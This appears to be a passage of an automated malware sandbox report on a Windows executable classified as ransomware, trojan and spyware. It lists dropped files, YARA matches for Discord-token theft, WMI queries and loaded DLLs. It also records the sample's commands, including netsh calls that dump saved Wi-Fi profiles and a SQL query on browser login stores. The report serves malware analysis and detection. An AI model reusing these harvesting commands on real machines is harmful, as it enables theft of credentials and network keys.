                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0042200C
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0041A217
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00412216
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0042435D
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004033C0
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0044F430
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004125E8
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0044663B
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00413801
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0042096F
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004129D0
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004119E3
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0041C9AE
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0047EA6F
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0040FA10
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0044EB59
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00423C81
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00411E78
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00442E0C
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00420EC0
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0044CF17
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00444FD2
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B888C52
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8B68A8
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8A78C8
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B887EA6
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8B8D50
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8A70B0
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8C26A0
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B89A6C1
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8A7978
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8AAFF8
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8ADC61
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8A1456
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8B43A0
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8B43D8
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9B8AC081
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Code function: 1_2_00007FFD9BA95904
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: String function: 004115D7 appears 36 times
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: String function: 00416C70 appears 39 times
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: String function: 00445AE0 appears 65 times
                          Source: aut66E4.tmp.0.dr  Static PE information: No import functions for PE file found
                          Source: JOUNLV.exe.0.dr  Static PE information: No import functions for PE file found
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: OriginalFilenamestub.exe6 vs LKxcbzlwkz.exe
                          Source: LKxcbzlwkz.exe  Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack, type: UNPACKEDPE  Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY  Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY  Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR  Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR  Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPED  Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPED  Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                          Source: JOUNLV.exe.0.dr, StringsCrypt.cs  Cryptographic APIs: 'CreateDecryptor'
                          Source: aut66E4.tmp.0.dr, StringsCrypt.cs  Cryptographic APIs: 'CreateDecryptor'
                          Source: JOUNLV.exe.0.dr, Report.cs  Task registration methods: 'CreateTask'
                          Source: aut66E4.tmp.0.dr, Report.cs  Task registration methods: 'CreateTask'
                          Source: classification engine  Classification label: mal100.rans.troj.spyw.evad.winEXE@35/91@10/8
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Code function: 0_2_0044AF6C GetLastError,FormatMessageW
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\checkip[1].htm
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Mutant created: NULL
                          Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Mutant created: \Sessions\1\BaseNamedObjects\ACR7Q5SJGKRPBM6NVQPJ
                          Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  File created: C:\Users\user\AppData\Local\Temp\aut66E4.tmp
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AEAWHK.bat" "
                          Source: LKxcbzlwkz.exe  Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\taskkill.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 4828)
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  File read: C:\Users\desktop.ini
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: SELECT * FROM logins;
                          Source: tmpF000.tmp.dat.1.dr  Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: LKxcbzlwkz.exe  ReversingLabs: Detection: 78%
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  File read: C:\Users\user\Desktop\LKxcbzlwkz.exe
                          Source: unknown  Process created: C:\Users\user\Desktop\LKxcbzlwkz.exe "C:\Users\user\Desktop\LKxcbzlwkz.exe"
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Process created: C:\Users\user\AppData\Local\Temp\JOUNLV.exe "C:\Users\user\AppData\Local\Temp\JOUNLV.exe"
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AEAWHK.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\openfiles.exe OPENFILES
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: unknown  Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\findstr.exe findstr All
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat"
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\taskkill.exe taskkill /F /PID 4828
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\timeout.exe timeout /T 2 /NOBREAK
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Process created: C:\Users\user\AppData\Local\Temp\JOUNLV.exe "C:\Users\user\AppData\Local\Temp\JOUNLV.exe"
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AEAWHK.bat" "
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat"
                          Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\openfiles.exe OPENFILES
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\findstr.exe findstr All
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\taskkill.exe taskkill /F /PID 4828
                          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\timeout.exe timeout /T 2 /NOBREAK
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: wsock32.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: version.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: winmm.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: mpr.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: wininet.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: avicap32.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: msvfw32.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: ntmarta.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: propsys.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: dlnashext.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: wpdshext.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: profapi.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: edputil.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: netutils.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: appresolver.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: bcp47langs.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: slc.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: sppc.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: pcacli.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: sfc_os.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: wbemcomn.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: amsi.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: sxs.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: napinsp.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: pnrpnsp.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: wshbth.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: nlaapi.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: iphlpapi.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: mswsock.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: dnsapi.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: winrnr.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: fwpuclnt.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: rasadhlp.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: winhttp.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: winnsi.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: schannel.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: mskeyprotect.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: ntasn1.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: msasn1.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: dpapi.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: gpapi.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: ncrypt.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe  Section loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: dhcpcsvc6.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: dhcpcsvc.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: rasapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: rasman.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: rtutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: secur32.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe  Section loaded: nlaapi.dll
